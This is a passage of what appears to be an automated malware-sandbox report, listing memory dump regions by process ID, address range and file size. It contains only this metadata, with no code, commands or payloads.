                                                                                                                    • memory/3108-2-0x00000000001D1000-0x0000000000239000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      416KB

                                                                                                                    • memory/3108-1-0x00000000779E4000-0x00000000779E6000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/3196-865-0x00000000001C0000-0x000000000020C000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      304KB

                                                                                                                    • memory/3404-160-0x0000000007640000-0x00000000076E3000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      652KB

                                                                                                                    • memory/3404-161-0x0000000007D70000-0x00000000083EA000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      6.5MB

                                                                                                                    • memory/3404-169-0x0000000007AA0000-0x0000000007AAA000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      40KB

                                                                                                                    • memory/3404-168-0x0000000007AB0000-0x0000000007AC2000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      72KB

                                                                                                                    • memory/3404-130-0x00000000029E0000-0x0000000002A16000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      216KB

                                                                                                                    • memory/3404-131-0x0000000005530000-0x0000000005B58000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      6.2MB

                                                                                                                    • memory/3404-132-0x0000000005430000-0x0000000005452000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      136KB

                                                                                                                    • memory/3404-133-0x0000000005C10000-0x0000000005C76000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      408KB

                                                                                                                    • memory/3404-134-0x0000000005C90000-0x0000000005CF6000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      408KB

                                                                                                                    • memory/3404-144-0x0000000005D80000-0x00000000060D4000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      3.3MB

                                                                                                                    • memory/3404-145-0x0000000006370000-0x000000000638E000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      120KB

                                                                                                                    • memory/3404-146-0x00000000063A0000-0x00000000063EC000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      304KB

                                                                                                                    • memory/3404-148-0x0000000007360000-0x0000000007392000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      200KB

                                                                                                                    • memory/3404-149-0x000000006FD70000-0x000000006FDBC000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      304KB

                                                                                                                    • memory/3404-159-0x0000000006970000-0x000000000698E000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      120KB

                                                                                                                    • memory/3404-167-0x0000000007960000-0x0000000007982000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      136KB

                                                                                                                    • memory/3404-162-0x0000000007400000-0x000000000741A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      104KB

                                                                                                                    • memory/3404-163-0x0000000007720000-0x000000000772A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      40KB

                                                                                                                    • memory/3404-164-0x00000000079D0000-0x0000000007A66000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      600KB

                                                                                                                    • memory/3404-165-0x00000000078B0000-0x00000000078C1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      68KB

                                                                                                                    • memory/3508-218-0x00000000009F0000-0x0000000000EC8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.8MB

                                                                                                                    • memory/3508-213-0x00000000009F0000-0x0000000000EC8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.8MB

                                                                                                                    • memory/3604-642-0x00000000004B0000-0x0000000000509000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      356KB

                                                                                                                    • memory/3604-639-0x00000000004B0000-0x0000000000509000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      356KB

                                                                                                                    • memory/3604-638-0x00000000004B0000-0x0000000000509000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      356KB

                                                                                                                    • memory/3900-669-0x0000000000340000-0x00000000007D0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.6MB

                                                                                                                    • memory/3900-664-0x0000000000340000-0x00000000007D0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.6MB

                                                                                                                    • memory/4028-45-0x0000000000400000-0x000000000045F000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      380KB

                                                                                                                    • memory/4028-43-0x0000000000400000-0x000000000045F000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      380KB

                                                                                                                    • memory/4148-418-0x0000000008380000-0x000000000858F000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.1MB

                                                                                                                    • memory/4148-445-0x00000000076A0000-0x00000000076A5000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      20KB

                                                                                                                    • memory/4148-214-0x0000000006FB0000-0x0000000007026000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      472KB

                                                                                                                    • memory/4148-252-0x0000000007370000-0x00000000073B2000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      264KB

                                                                                                                    • memory/4148-441-0x0000000007690000-0x00000000076A0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/4148-440-0x0000000007690000-0x00000000076A0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/4148-442-0x00000000076A0000-0x00000000076A5000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      20KB

                                                                                                                    • memory/4148-433-0x0000000007690000-0x00000000076A0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/4148-211-0x0000000006050000-0x0000000006094000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      272KB

                                                                                                                    • memory/4148-450-0x000000000BF70000-0x000000000BF77000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      28KB

                                                                                                                    • memory/4148-191-0x0000000005CD0000-0x0000000005D1C000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      304KB

                                                                                                                    • memory/4148-449-0x000000000BAE0000-0x000000000BEEB000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.0MB

                                                                                                                    • memory/4148-190-0x00000000058E0000-0x0000000005C34000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      3.3MB

                                                                                                                    • memory/4148-250-0x0000000004A90000-0x0000000004A9A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      40KB

                                                                                                                    • memory/4148-439-0x0000000007690000-0x00000000076A0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/4148-438-0x0000000007690000-0x00000000076A0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/4148-446-0x000000000BAE0000-0x000000000BEEB000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.0MB

                                                                                                                    • memory/4148-437-0x0000000007690000-0x00000000076A0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/4148-413-0x0000000008380000-0x000000000858F000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.1MB

                                                                                                                    • memory/4148-419-0x0000000007680000-0x0000000007686000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      24KB

                                                                                                                    • memory/4148-422-0x0000000007690000-0x00000000076A0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/4148-436-0x0000000007690000-0x00000000076A0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/4148-425-0x0000000007690000-0x00000000076A0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/4148-426-0x0000000007690000-0x00000000076A0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/4148-427-0x0000000007690000-0x00000000076A0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/4148-428-0x0000000007690000-0x00000000076A0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/4148-429-0x0000000007690000-0x00000000076A0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/4148-430-0x0000000007690000-0x00000000076A0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/4148-431-0x0000000007690000-0x00000000076A0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/4148-432-0x0000000007690000-0x00000000076A0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/4148-434-0x0000000007690000-0x00000000076A0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/4148-435-0x0000000007690000-0x00000000076A0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/4248-737-0x0000000000F70000-0x0000000000FCA000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      360KB

                                                                                                                    • memory/4408-84-0x00000000009F0000-0x0000000000EC8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.8MB

                                                                                                                    • memory/4408-49-0x00000000009F0000-0x0000000000EC8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.8MB

                                                                                                                    • memory/4408-633-0x00000000009F0000-0x0000000000EC8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.8MB

                                                                                                                    • memory/4408-122-0x00000000009F0000-0x0000000000EC8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.8MB

                                                                                                                    • memory/4408-679-0x00000000009F0000-0x0000000000EC8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.8MB

                                                                                                                    • memory/4408-17-0x00000000009F0000-0x0000000000EC8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.8MB

                                                                                                                    • memory/4408-21-0x00000000009F0000-0x0000000000EC8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.8MB

                                                                                                                    • memory/4408-20-0x00000000009F1000-0x0000000000A59000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      416KB

                                                                                                                    • memory/4408-50-0x00000000009F0000-0x0000000000EC8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.8MB

                                                                                                                    • memory/4408-38-0x00000000009F0000-0x0000000000EC8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.8MB

                                                                                                                    • memory/4408-48-0x00000000009F0000-0x0000000000EC8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.8MB

                                                                                                                    • memory/4408-47-0x00000000009F0000-0x0000000000EC8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.8MB

                                                                                                                    • memory/4408-46-0x00000000009F1000-0x0000000000A59000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      416KB

                                                                                                                    • memory/4408-254-0x00000000009F0000-0x0000000000EC8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.8MB

                                                                                                                    • memory/4408-22-0x00000000009F0000-0x0000000000EC8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.8MB

                                                                                                                    • memory/5028-692-0x00000000003A0000-0x0000000000853000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.7MB

                                                                                                                    • memory/5028-689-0x00000000003A0000-0x0000000000853000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.7MB

                                                                                                                    • memory/5132-1319-0x00007FFC54430000-0x00007FFC5445D000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      180KB

                                                                                                                    • memory/5132-1333-0x00007FFC53710000-0x00007FFC537DF000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      828KB

                                                                                                                    • memory/5132-1314-0x00007FFC57A60000-0x00007FFC57A83000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      140KB

                                                                                                                    • memory/5132-1318-0x00007FFC545A0000-0x00007FFC545B9000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      100KB

                                                                                                                    • memory/5132-1321-0x00007FFC57D90000-0x00007FFC57D9D000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      52KB

                                                                                                                    • memory/5132-1317-0x00007FFC5A8B0000-0x00007FFC5A8BD000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      52KB

                                                                                                                    • memory/5132-1323-0x00007FFC42B80000-0x00007FFC430A0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      5.1MB

                                                                                                                    • memory/5132-1324-0x00007FFC53B00000-0x00007FFC53BCD000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      820KB

                                                                                                                    • memory/5132-1322-0x00007FFC54080000-0x00007FFC540B3000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      204KB

                                                                                                                    • memory/5132-1316-0x00007FFC57E10000-0x00007FFC57E29000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      100KB

                                                                                                                    • memory/5132-1334-0x00007FFC53A70000-0x00007FFC53AF7000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      540KB

                                                                                                                    • memory/5132-1320-0x00007FFC53EB0000-0x00007FFC53EE6000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      216KB

                                                                                                                    • memory/5132-1338-0x00007FFC54380000-0x00007FFC5438B000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      44KB

                                                                                                                    • memory/5132-1339-0x00007FFC535F0000-0x00007FFC5370C000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      1.1MB

                                                                                                                    • memory/5132-1337-0x00007FFC54410000-0x00007FFC54424000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      80KB

                                                                                                                    • memory/5132-1336-0x00007FFC53A40000-0x00007FFC53A66000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      152KB

                                                                                                                    • memory/5132-1335-0x00007FFC430A0000-0x00007FFC43689000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      5.9MB

                                                                                                                    • memory/5132-1315-0x00007FFC5B870000-0x00007FFC5B87F000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      60KB

                                                                                                                    • memory/5132-1311-0x00007FFC430A0000-0x00007FFC43689000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      5.9MB

                                                                                                                    • memory/5392-1313-0x0000000000790000-0x0000000000BEA000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.4MB

                                                                                                                    • memory/5392-1040-0x0000000000790000-0x0000000000BEA000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.4MB

                                                                                                                    • memory/5392-1039-0x0000000000790000-0x0000000000BEA000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.4MB

                                                                                                                    • memory/5392-1032-0x0000000000790000-0x0000000000BEA000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.4MB